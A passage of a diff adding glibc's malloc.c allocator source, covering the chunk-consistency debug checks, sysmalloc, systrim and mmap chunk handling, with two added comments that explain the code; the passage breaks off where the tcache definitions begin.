+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
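+/* Annotation (not part of upstream malloc.c): sysmalloc above takes one of
+   three paths -- (1) a direct MMAP when there is no usable arena, or when
+   the request is at or above mp_.mmap_threshold and the mmap count limit
+   has not been reached, returning an IS_MMAPPED chunk; (2) for a non-main
+   arena, grow_heap()/new_heap(), fenceposting and freeing the old top;
+   (3) for the main arena, MORECORE (sbrk) with mmap as a fallback, after
+   which the enlarged top chunk is split to satisfy the request.  */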
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least), so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
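+/* Annotation (not part of upstream malloc.c): for mmapped chunks the
+   prev_size field stores the front-alignment slack recorded in sysmalloc,
+   so the original mapping starts at p - prev_size (p) and spans
+   prev_size + size bytes; the page-alignment test above rejects pointers
+   that cannot have come from such a mapping.  */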
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
